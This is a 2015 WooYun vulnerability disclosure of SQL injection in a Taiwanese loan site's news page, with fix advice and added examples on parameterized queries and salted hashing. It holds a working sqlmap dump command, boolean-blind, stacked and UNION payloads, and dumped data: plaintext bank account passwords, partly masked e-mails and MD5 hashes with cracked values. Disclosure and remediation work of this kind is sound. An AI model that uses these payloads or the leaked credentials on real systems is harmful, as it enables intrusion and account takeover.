Vulnerability summary

Defect ID: wooyun-2015-0152888

Title: SQL injection in a 臺灣幸福租 page (1.36 million log rows exposed / plaintext passwords and contact e-mail addresses of major banks' management accounts exposed / users' real names and passwords exposed) (Taiwan)

Vendor: 臺灣幸福租

Author: 路人甲

Submitted: 2015-11-08 23:14

Fixed: 2015-12-27 18:42

Published: 2015-12-27 18:42

Type:

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner (Hitcon, the Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-11-08: Details sent to the vendor; awaiting vendor response
2015-11-12: Vendor confirmed; details visible to the vendor only
2015-11-22: Details disclosed to core white hats and domain experts
2015-12-02: Details disclosed to regular white hats
2015-12-12: Details disclosed to intern white hats
2015-12-27: Details disclosed to the public

Summary:

SQL injection in a 臺灣幸福租 page (1.36 million log rows exposed / plaintext passwords and contact e-mail addresses of major banks' management accounts exposed / users' real names and passwords exposed)

Details:

URL: http://**.**.**.**/newsDetail.php?id=35639

python sqlmap.py -u "http://**.**.**.**/newsDetail.php?id=35639" -p id --technique=BSU -D LoanDB -T tBankLoing -C b_id,b_name,b_pass,b_mail --dump


Database: TWHG_NEWS
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| LiteraryCount | 1360221 |


Database: LoanDB
Table: tBankLoing
[14 entries]
+------+----------+-------------+------------------------------+
| b_id | b_name   | b_pass      | b_mail                       |
+------+----------+-------------+------------------------------+
[masked area]
*****---+-----------*****
***** | b_mail *****
*****---+-----------*****
***** | [email protected]**.*****
*****i | [email protected]*******
*****ed | [email protected]******
*****456789 | [email protected]*******
*****05 | 94196*****
*****ac | [email protected]******
*****irstbank | i1*****
*****888 | heroki.tsa*****
*****athaybk | nt13*****
*****6 | [email protected]**.******
*****0130710 | 2987*****
*****egabank | honw*****
*****hinatrust | pearl.*****
*****6 | [email protected]*******


+------+----------+-------------+------------------------------+


Database: TWHG_NEWS
Table: User
[34 entries]
+----------+-------------------------------------------+
| UserName | UserPassword |
+----------+-------------------------------------------+
[masked area]
*****4ebb619b556f526*****
*****bad9e18e2f1b58e*****
*****438925a76754a24*****
*****2d58baf6f4f5365*****
*****41245ac84928ada*****
*****6c3071c1850bf10*****
*****5876486b9350ce5*****
*****7e649ebc8cf1a40*****
*****23e32b34d30224*****
*****3e3934ed92c88d*****
*****d51eec5559b68f*****
*****f79c8a86662af9*****
*****e00b786c6686862*****
*****abbe56e057f20f*****
*****af5688634085072*****
*****c20036dbd8313e*****
*****d04dc20036dbd83*****
*****d04dc20036dbd83*****
*****48d57bf3e548cc*****
*****bbeed946fc96501*****
*****56bef9cd0569d7a*****
*****822642b0f61ee4*****
*****b8ef59757e2883e*****
*****97b568c54430fd3*****
*****465aa15d4cc2d69*****
*****41f2fb6dc18a91c*****
*****901310fe2388d4*****
*****e011c1b88bcd41b*****
*****739b109746896b4*****
*****1c90b23add03c63*****
*****e9d678a6c54ab7c*****
*****1e7abbb9fd5a378*****
*****6c13ed2311da438*****
*****790b78152996d2a*****


+----------+-------------------------------------------+

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35639 AND 3610=3610
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id=35639;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-3508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6a71,0x54696b4e4642465348577768554a647169714766684b724e444350514a6a4d6b6a5462484b457766,0x716b706271)-- -
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
current user: 'twhgNews'@'%'
current user is DBA: False
database management system users [1]:
[*] 'twhgNews'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 766 |
| GLOBAL_VARIABLES | 272 |
| SESSION_VARIABLES | 272 |
| GLOBAL_STATUS | 268 |
| SESSION_STATUS | 268 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PROCESSLIST | 87 |
| PARTITIONS | 67 |
| TABLES | 67 |
| STATISTICS | 59 |
| KEY_COLUMN_USAGE | 39 |
| TABLE_CONSTRAINTS | 39 |
| CHARACTER_SETS | 36 |
| PLUGINS | 6 |
| ENGINES | 5 |
| SCHEMA_PRIVILEGES | 4 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: LoanDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tBankCont | 4294 |
| tBankCick | 1120 |
| tBankLoginLog | 516 |
| tBankOperateLog | 411 |
| tBankRate | 78 |
| tBankAd | 45 |
| tBankLoing | 14 |
| tBankSale | 13 |
+---------------------------------------+---------+
Database: TWHG_NEWS
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| LiteraryCount | 1360221 |
| FB_Count | 235285 |
| OperateLog | 51225 |
| Literary | 35611 |
| LiteraryContent | 16901 |
| Photo | 6604 |
| LoginLog | 4209 |
| ThingFilter2 | 714 |
| Video | 520 |
| tZip | 373 |
| Message | 351 |
| ArticleWord | 263 |
| Literary_Preview | 157 |
| ThingFilter | 73 |
| Girls | 38 |
| `User` | 34 |
| LiterarySubClass | 27 |
| VideoSubClass | 23 |
| NewsClassD | 17 |
| Famous | 16 |
| WomanMainClass | 10 |
| LiteraryMainClass | 8 |
| Trend | 6 |
| Logo | 5 |
| VideoMainClass | 5 |
| WomanHome | 4 |
| Photo_Temp | 2 |
| PostCount | 2 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: LoanDB
Table: tBankLoing
[1 column]
+--------+----------+
| Column | Type |
+--------+----------+
| b_pass | char(30) |
+--------+----------+
Database: TWHG_NEWS
Table: User
[1 column]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| UserPassword | varchar(40) |
+--------------+-------------+
Database: LoanDB
Table: tBankLoing
[14 entries]
+-------------+
| b_pass |
+-------------+
| 123456 |
| 123456 |
| 123456 |
| 20130710 |
| cathaybk |
| chartered |
| chinatrust |
| firstbank |
| fubon888 |
| megabank |
| ml123456789 |
| shanghai |
| sinopac |
| tai05 |
+-------------+
Database: TWHG_NEWS
Table: User
[34 entries]
+-------------------------------------------+
| UserPassword |
+-------------------------------------------+
| 02896722b32d58baf6f4f5365ddc3651 |
| 0a5988c14956bef9cd0569d7a719506d |
| 0cbf2f9ccca132f79c8a86662af9c1a1 |
| 14c13539326c13ed2311da438ab870e3 |
| 1775ea192de1833e3934ed92c88d7aa7 |
| 20ff12a277344c48d57bf3e548cc2693 |
| 305c6731866925822642b0f61ee46126 |
| 3704dde2d21c90b23add03c636fb9e5a |
| 48a57eceb3bad9e18e2f1b58e7f6cadd (530417) |
| 49122b2b64af56886340850722ccc944 |
| 496092f628e011c1b88bcd41b47cc070 |
| 49c3eae36097b568c54430fd37fa741b |
| 4eaa8414c2739b109746896b43cf4214 |
| 517960763f6c3071c1850bf105084c35 |
| 56e62457831e7abbb9fd5a3781088d7f |
| 5f701bdd38465aa15d4cc2d694af04b6 |
| 674c459441b7d1901310fe2388d4d96a |
| 6d19abde21e00b786c6686862282081e |
| 6d5c4112df438925a76754a244fb1929 |
| 703516008441f2fb6dc18a91c092c0de |
| 77970952f3790b78152996d2ad1da052 |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 88bf1873e341245ac84928adaba38a36 |
| 93279e3308bdbbeed946fc965017f67a (121212) |
| a3b34c0871dc2fd51eec5559b68f709d (play) |
| aca877be7e4ebb619b556f5267e8aa02 |
| db1b4e5e915876486b9350ce5048cb58 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e2981c8c9be9d678a6c54ab7c837bcf8 |
| f3a8e7f0af7e649ebc8cf1a40f1d0f5f |
| f5aa69b2f0241323e32b34d30224e26d |
| f6211163fbb8ef59757e2883e1017280 |
+-------------------------------------------+
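The UserPassword values above are 32 hex characters with sqlmap's wordlist hits shown in parentheses, and b_pass further up is stored in the clear. What follows is an added example, not code from the report or from the vendor: it reproduces the wordlist check against hashes copied from the dump, using the leaked b_pass values plus a few common PINs as a constructed candidate list, and contrasts that with salted PBKDF2-HMAC-SHA256 storage. The iterations$salt$hash record format and the 600,000-iteration default are choices made for this demo.

```python
"""
Added example (not from the original report): reproduce the unsalted-MD5
wordlist check on hashes copied from the dump, then show salted, slow storage
where a wordlist match has to be recomputed per user instead of looked up once.
"""
import hashlib
import hmac
import os
from typing import Optional

# Hashes copied from the report's UserPassword dump.
LEAKED_HASHES = [
    "e10adc3949ba59abbe56e057f20f883e",
    "81dc9bdb52d04dc20036dbd8313ed055",
    "93279e3308bdbbeed946fc965017f67a",
    "a3b34c0871dc2fd51eec5559b68f709d",
    "f5aa69b2f0241323e32b34d30224e26d",
]

# Constructed candidate list: the plaintext b_pass values from the LoanDB dump plus
# a few common PINs, on the assumption that operators reuse passwords across the two sites.
WORDLIST = ["123456", "1234", "121212", "play", "password", "20130710", "cathaybk",
            "chinatrust", "firstbank", "fubon888", "megabank", "sinopac", "tai05"]


def looks_like_md5(value: str) -> bool:
    """32 lowercase hex characters: the shape of every UserPassword value in the dump."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def crack_unsalted_md5(hashes, wordlist) -> dict:
    """Unsalted: one MD5 per candidate word tests it against every user at once."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: table[h] for h in hashes if h in table}


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; a fresh 16-byte salt per user defeats the shared lookup table."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("unsalted MD5 hits:", crack_unsalted_md5(LEAKED_HASHES, WORDLIST))
    record = hash_password("123456")
    print("stored:", record)
    print("verify 123456:", verify_password("123456", record),
          "verify 1234:", verify_password("1234", record))
```

The MD5 lookup table is built once and reused for all 34 users, which is why a single shared hash is so cheap to reverse; with a per-user salt every candidate must be hashed again for each record, and the iteration count sets the cost of each attempt.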
Database: TWHG_NEWS
Table: LiteraryCount
[5 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(6) |
| L_create | timestamp |
| L_id | int(6) |
| L_Number | int(5) |
| L_sub | varchar(200) |
+----------+--------------+
Database: TWHG_NEWS
Table: LiteraryCount
[10 entries]
+----+---------------------+-------+----------+---------+
| id | L_create | L_id | L_Number | L_sub |
+----+---------------------+-------+----------+---------+
| 1 | 2013-03-18 19:48:19 | 27661 | 0 | <blank> |
| 2 | 2013-03-19 00:39:43 | 27655 | 0 | <blank> |
| 3 | 2013-03-19 00:41:12 | 27652 | 0 | <blank> |
| 4 | 2013-03-19 00:41:17 | 27653 | 0 | <blank> |
| 5 | 2013-03-19 00:41:22 | 27654 | 0 | <blank> |
| 6 | 2013-03-19 00:41:27 | 27656 | 0 | <blank> |
| 7 | 2013-03-19 09:10:27 | 27660 | 0 | <blank> |
| 8 | 2013-03-19 09:32:14 | 27661 | 0 | <blank> |
| 9 | 2013-03-19 09:32:20 | 27651 | 0 | <blank> |
| 10 | 2013-03-19 09:32:24 | 27661 | 0 | <blank> |
+----+---------------------+-------+----------+---------+
Database: TWHG_NEWS
Table: User
[25 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| ChangeDate | datetime |
| CreateDate | datetime |
| FamousAdd | int(11) |
| FamousDelete | int(11) |
| FamousEdit | int(11) |
| GirlEdit | int(11) |
| GirlHome | int(11) |
| Grade | int(11) |
| HomeLiteraryEdit | int(11) |
| ID | int(11) |
| LiteraryAdd | int(11) |
| LiteraryDelete | int(11) |
| LiteraryEdit | int(11) |
| Status | int(11) |
| StoreID | int(11) |
| TrendEdit | int(11) |
| UserAccount | varchar(30) |
| UserAdd | int(11) |
| UserDelete | int(11) |
| UserEdit | int(11) |
| UserName | varchar(40) |
| UserPassword | varchar(40) |
| VideoAdd | int(11) |
| VideoDelete | int(11) |
| VideoEdit | int(11) |
+------------------+-------------+
Database: LoanDB
Table: tBankLoing
[15 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| b_ab | int(2) |
| b_accut | char(20) |
| b_authority | int(3) |
| b_id | int(6) |
| b_mail | varchar(100) |
| b_name | varchar(40) |
| b_online | char(2) |
| b_pass | char(30) |
| b_pic | varchar(20) |
| b_url | varchar(200) |
| bScr | int(1) |
| ch_T | datetime |
| r_id | varchar(50) |
| up_t | timestamp |
| who_ch | int(6) |
+-------------+--------------+

Fix:

Deploy a WAF.

A WAF only filters known payload shapes and leaves the defect in place. The proof above shows the id parameter of newsDetail.php reaching the query as text (boolean-blind, stacked and UNION payloads all succeed), so the fix is to cast id to an integer and bind it as a query parameter. The dumps also show credentials stored in the clear (tBankLoing.b_pass, char(30)) or as unsalted 32-hex hashes that sqlmap matched from a wordlist (User.UserPassword), and one account, 'twhgNews'@'%', reading both TWHG_NEWS and LoanDB; both tables need a salted, slow password hash, and the news site's database account should be restricted to its own schema.
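To make the fix concrete, here is an added example (not code from the report or from the 臺灣幸福租 site) that stands in for newsDetail.php?id=...: a string-built query that the report's boolean-blind payload and a UNION payload of the same shape pass straight through, beside a version that validates id as an integer and binds it. SQLite replaces MySQL so the script runs offline; the Literary and User rows are constructed, the "false" twin of the boolean payload is constructed, and sqlmap's CONCAT(0x71707a6a71, ..., 0x716b706271) markers (the strings qpzjq and qkpbq) are rewritten with SQLite's || operator.

```python
"""
Added example (not code from the original report or the vendor's site): a
stand-in for newsDetail.php?id=... showing why the injected payloads work
against string-built SQL and fail once the parameter is validated and bound.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed fixture: one article row and one admin row (column names from the dump)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Literary (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        INSERT INTO Literary VALUES (35639, 'Sample article', 'body text', 'editor');
        CREATE TABLE User (UserName TEXT, UserPassword TEXT);
        INSERT INTO User VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return con


def news_detail_vulnerable(con: sqlite3.Connection, id_param: str) -> list:
    # The defect behind the finding: the raw GET value is spliced into the SQL text,
    # so anything after the number is parsed as SQL. Four selected columns match the
    # "Generic UNION query (NULL) - 4 columns" line in the proof.
    sql = f"SELECT id, title, body, author FROM Literary WHERE id={id_param}"
    return con.execute(sql).fetchall()


def news_detail_safe(con: sqlite3.Connection, id_param: str) -> list:
    # Hardened form: validate the type, then bind. Attacker text never reaches the
    # parser as SQL, and a non-numeric id is rejected before any query runs.
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    sql = "SELECT id, title, body, author FROM Literary WHERE id=?"
    return con.execute(sql, (id_value,)).fetchall()


PAYLOADS = {
    # Boolean-based blind pair: the first is the report's payload, the second its
    # constructed "false" twin; a differing response is the oracle sqlmap relies on.
    "true": "35639 AND 3610=3610",
    "false": "35639 AND 3610=3611",
    # UNION: a negative id empties the real result set and the appended SELECT reads
    # another table; the qpzjq/qkpbq wrappers mirror sqlmap's hex CONCAT markers.
    "union": "-3508 UNION ALL SELECT NULL,NULL,NULL,'qpzjq'||UserPassword||'qkpbq' FROM User-- -",
}


def run_payloads(con: sqlite3.Connection, handler) -> dict:
    """Run every payload through one handler and collect the rows it returns."""
    return {name: handler(con, payload) for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    db = build_db()
    for label, handler in (("vulnerable", news_detail_vulnerable), ("safe", news_detail_safe)):
        print(label, run_payloads(db, handler))
```

The stacked-query payload from the proof (;(SELECT * FROM (SELECT(SLEEP(5)))RbQh)#) is left out because sqlite3's execute() refuses multi-statement strings and SQLite has no SLEEP(); on a MySQL driver with multi-statements enabled it rides on the same concatenation, and the same integer cast plus parameter binding stops it.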

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-11-12 18:40

Vendor reply:

Thanks for the report.

Latest status:

None